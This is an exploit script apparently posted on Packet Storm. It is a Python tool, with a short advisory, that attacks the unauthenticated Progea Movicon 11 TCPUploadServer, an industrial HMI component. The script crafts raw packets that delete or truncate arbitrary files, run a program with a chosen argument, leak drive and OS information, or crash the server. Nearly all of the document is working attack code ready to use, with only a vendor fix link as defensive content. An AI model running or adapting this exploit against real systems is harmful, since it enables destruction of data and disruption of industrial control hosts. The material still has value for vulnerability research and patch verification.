The Progea Movicon 11 TCPUploadServer allows remote users to execute functions on the server without any form of authentication. Impacts include deletion of arbitrary files, execution of a program with an arbitrary argument, crashing the server, information disclosure, and more. This design flaw puts the host running this server at risk of potentially unauthorized functions being executed on the system.
fbc50819938d8873cd7f19b69cc6ec9e277dfe76726a60a616df1890c4c8cdf8#!/usr/bin/python
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of potentially unauthorized functions being
# executed on the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#
import sys
import socket
hdr="MovX"
funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V
if len(sys.argv)<3:
print "Progea Movicon TCPUploadServer Remote Exploit"
print "Usage: %s <target> <function> [data]"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Create a folder"
print "[2] Overwrite a file with NULL and cause 100%% CPU"
print "[3] Delete a file"
print "[4] Execute moviconRunTime.exe with a specified argument"
print "[5] Create a desktop shortcut"
print "[6] Retrieve drive information"
print "[7] Retrieve os service pack"
print "[8] Crash the server\n"
print "* Default data is \"test\""
sys.exit(0)
target=sys.argv[1]
port=10651
cs=target,port
func=int(sys.argv[2])
if len(sys.argv)==4:
data=sys.argv[3]
else:
data="test"
if func not in funcs:
print "Invalid function"
sys.exit(1)
if(func==1):
print "Crafting a packet to create the folder \"%s\"..."%data
pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))
elif(func==2):
print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data
pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data))
# O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on
elif(func==3):
print "Crafting a packet to delete the file \"%s\"..."%data
pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))
elif(func==4):
print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data
pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))
elif(func==5):
print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data
pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))
elif(func==6):
print "Crafting a packet to retrieve drive information..."
pkt=hdr+"6"+"\x01"
elif(func==7):
print "Crafting a packet to retrieve os service pack..."
pkt=hdr+"7"+"\x00"
elif(func==8):
print "Crafting a packet to crash the server..."
pkt=hdr+"B"+"\x00"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt)
sock.send(pkt)
print "\nPacket sent!"
if((func==6)|(func==7)):
info=sock.recv(128)
if(info):
print "\nRetrieved info:\n"
if(func==6):
print "%s"%info[6:]
elif(func==7):
print "%s"%info[22:]
else:
print "\nNo info"
sock.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed